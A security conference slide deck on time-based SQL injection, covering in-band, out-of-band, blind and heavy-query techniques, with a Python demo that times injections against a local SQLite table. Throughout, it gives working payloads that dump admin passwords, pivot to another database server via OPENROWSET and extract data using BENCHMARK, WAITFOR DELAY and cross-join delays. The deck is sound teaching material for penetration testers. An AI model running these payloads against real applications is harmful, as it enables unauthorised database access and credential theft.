© 2008 Security-Assessment.com
Time Based SQL Injection
Presented by Muhaimin Dzulfakar
Who am I
Muhaimin Dzulfakar
Security Consultant – Security-Assessment.com
Application and network pen-tester
Agenda
What is time based SQL Injection
Differences between blind and time based SQL Injection
Time based injection with heavy queries
Limitations of time based SQL Injection
Different types of SQL Injection
In Band Injection
Out of Band Injection
Blind SQL Injection
Time Based SQL Injection
In Band Injection
Results come back in the application's own response, embedded via UNION SELECT
Also useful when the SQL error message is displayed (the error itself leaks data in band)
Fastest way to extract data
Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null FROM admin/*
(0x3a is ':' used to separate the two values; the UNION must match the column count of the original query, six here)
Out of Band Injection
Uses a different communication channel to drill for data
Ex: a web mail application in which data received via SMTP is processed
Example attack: reaching a neighbouring database server with OOB injection
Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--
(OPENROWSET makes the injected MSSQL server open its own connection to 10.1.1.1 as sa with a blank password and return that server's users table; on SQL Server 2005 and later this needs the 'Ad Hoc Distributed Queries' option enabled)
Out of Band Injection
[Diagram: web server www.buyviagra.com queries Database A; the OOB injection makes Database A reach the neighbouring Database B at 10.1.1.1]
Blind SQL Injection
The application generates a custom error message for a failed response and the normal page for a successful response
Compare the true and the false response
AND 1=1 -> true, AND 1=2 -> false
Read data byte by byte
Time Based SQL Injection
Use a time delay to differentiate between true and false
True response – the time delay is executed
False response – the time delay is not executed
Read data byte by byte – exactly the same method as blind injection, with response time instead of page content as the oracle
First example in Chris Anley's paper "(more) Advanced SQL Injection"
Another example is in David Litchfield's paper "Data Mining with SQL Injection and Inference"
When we need Time Based SQL Injection
When the application generates the default page for both the true and the false response
When the application generates the same custom error page for both the true and the false response
The injection is successful but its effect can't be seen by the attacker
Scenario 1 (Blind Injection attack)
$default=1
if value is not between 1-20
{
redirect user to page.php?id=$default
execute SQL statement
}
1 AND 1=1 [TRUE] -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILED!
Scenario 1 (Time Based Blind Injection attack)
$default=1
if value is not between 1-20
{
redirect user to page.php?id=$default
execute SQL statement
}
1 AND 1=1 [TRUE] -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond
TIME BASED BLIND INJECTION WORKS!
Time Based SQL Injection
[Screenshot of the two response times: TRUE = 2478 ms, FALSE = 117 ms]
Spot the difference
Blind Injection (for MySQL)
1 AND ASCII(substring((@@version),1,1))<52
The parts: the query (@@version), the position (1), the operator (<) and the character (52, i.e. ASCII '4')
If the first character of the database version is less than 4, the condition is true and the normal page is returned
If the first character of the database version is 4 or more, the condition is false and the error page is returned
Spot the difference
Time Based Blind Injection (for MySQL)
1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
The same query, position, operator and character, plus a time delay: BENCHMARK runs SHA1 900000 times (the count controls how long it takes)
If the first character of the database version is less than 4, BENCHMARK executes and the response is delayed
If the first character of the database version is not less than 4, BENCHMARK does not execute and the response is immediate
(IFNULL maps a NULL result, e.g. a position past the end of the string, to 0 so the test still gives a clean false)
Time Based Injection on MSSQL
Time Based Injection (MSSQL)
1; IF (ASCII(SUBSTRING((SELECT @@version),25,1)) < 52) WAITFOR DELAY '0:0:9'--
The parts: the query (@@version), the position (25), the operator (<), the character (52, i.e. '4') and the time delay (WAITFOR DELAY '0:0:9')
If the character at position 25 of the version string is less than 4, WAITFOR DELAY executes and the response arrives about 9 seconds late; otherwise it returns immediately
Unlike the MySQL BENCHMARK form, IF and WAITFOR DELAY are statements rather than expressions, so this payload is a stacked query (a second statement after the ;), which MSSQL accepts from most drivers
Other Databases
Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions
Time Based Injection is still possible by using heavy queries
Chema Alonso and Jose Parada presented this at Defcon 2008
2 types of conditions in the 'where' clause
Light condition first
Heavy condition first
Select A from B where ConditionA and ConditionB
Heavy condition first (heavy condition takes 100 sec, light condition takes 10 sec; results from Alonso's research)
Heavy condition | Light condition | Result | Time
False | not evaluated | False | 100 seconds
True | True | True | 110 seconds
True | False | False | 110 seconds
Light condition first (light condition takes 10 sec, heavy condition takes 100 sec; results from Alonso's research)
Light condition | Heavy condition | Result | Time
False | not evaluated | False | 10 seconds
True | True | True | 110 seconds
True | False | False | 110 seconds
Only the light-first layout turns the light condition's truth value into a measurable difference (10 vs 110 seconds), so the attacker's test must be the light condition and it must sit where the database evaluates it first
Heavy Queries
Oracle evaluates the conditions from left to right
MS Access evaluates the conditions from right to left
MSSQL evaluates the light condition first regardless of the written order (the optimizer reorders them)
A table name needs to be known, since the heavy query is built by cross-joining it with itself
Some of the well known default tables
MSSQL – sysusers
MySQL – information_schema.columns
Oracle – all_users
Heavy Queries
Example of time based injection using heavy queries on MSSQL (light condition evaluates first)
1 AND (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8) > 0 AND 52 < (SELECT TOP 1 ASCII(SUBSTRING(name,1,1)) FROM sysusers)
The heavy query is the eight-way self cross join of sysusers (its row count to the eighth power); the light query is the comparison on the first character of the first user name
Because MSSQL evaluates the light condition first, the cross join only runs when the comparison is true: a true answer is slow, a false answer is fast
Suitable for databases that do not support time delay functions
Ex: Oracle and MS Access (put the light condition on the side the database evaluates first)
Short-circuit evaluation is optimizer behaviour rather than a guarantee, so calibrate with a known true and a known false condition before trusting the timings
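The evaluation-order tables and the MSSQL heavy-query payload above, as an added example that is not from the presentation. It uses SQLite, which, like the slide says of Oracle, evaluates AND terms left to right and stops at the first false one, with a constructed 30-row `users` table in place of sysusers and a four-way self cross join as the heavy condition; `light`, `measure` and `light_condition_is_evaluated_first` are names chosen here. The last function is the calibration check a tester would run before trusting heavy-query timings against an engine whose evaluation order is not known.

```python
import sqlite3
import time

# Constructed stand-in: SQLite instead of MSSQL/Oracle/Access, and a 30-row
# `users` table instead of sysusers. SQLite evaluates AND terms in written
# order with short-circuiting, i.e. "left to right" in the slide's terms.
ROWS = 30
# Heavy condition: a four-way self cross join, ROWS**4 = 810,000 row combinations
HEAVY = "(SELECT count(*) FROM users AS s1, users AS s2, users AS s3, users AS s4) > 0"


def build_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget')")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)",
                     [(f"user{i:02d}",) for i in range(ROWS)])
    return conn


def light(threshold):
    """The attacker's cheap test, same shape as the slide's
    `52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)`.
    Every name starts with 'u' (117): threshold 52 is true, 200 is false."""
    return f"{threshold} < (SELECT unicode(substr(name, 1, 1)) FROM users LIMIT 1)"


def timed_lookup(conn, payload):
    """Vulnerable query (string concatenation); returns elapsed seconds."""
    sql = "SELECT name FROM products WHERE id = " + payload
    start = time.perf_counter()
    conn.execute(sql).fetchall()
    return time.perf_counter() - start


def measure(conn):
    """Time the four combinations from the two evaluation-order tables."""
    return {
        "light_first_true":  timed_lookup(conn, f"1 AND {light(52)} AND {HEAVY}"),
        "light_first_false": timed_lookup(conn, f"1 AND {light(200)} AND {HEAVY}"),
        "heavy_first_true":  timed_lookup(conn, f"1 AND {HEAVY} AND {light(52)}"),
        "heavy_first_false": timed_lookup(conn, f"1 AND {HEAVY} AND {light(200)}"),
    }


def light_condition_is_evaluated_first(conn, factor=10):
    """Calibration before trusting heavy-query timings: with the light condition
    written first, a false test must come back much faster than a true one and
    than the heavy-first layout, which pays for the cross join either way."""
    t = measure(conn)
    return (t["light_first_false"] * factor < t["light_first_true"]
            and t["light_first_false"] * factor < t["heavy_first_false"])


if __name__ == "__main__":
    conn = build_target()
    for name, secs in measure(conn).items():
        print(f"{name:18s} {secs:.3f}s")
    print("left-to-right short-circuit:", light_condition_is_evaluated_first(conn))
```

Run as a script it prints the four timings: the false light condition placed first returns in microseconds, every other combination pays for the cross join. On an engine that evaluates right to left (MS Access per the slide) the same check would pass only with the light condition written last, which is exactly what the calibration is there to find out.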
Limitations
Results are unreliable when the server is busy: load and network jitter can be mistaken for the injected delay, so probes need a calibrated threshold or repetition
With heavy queries the delay also depends on how much data is stored in the table
Demo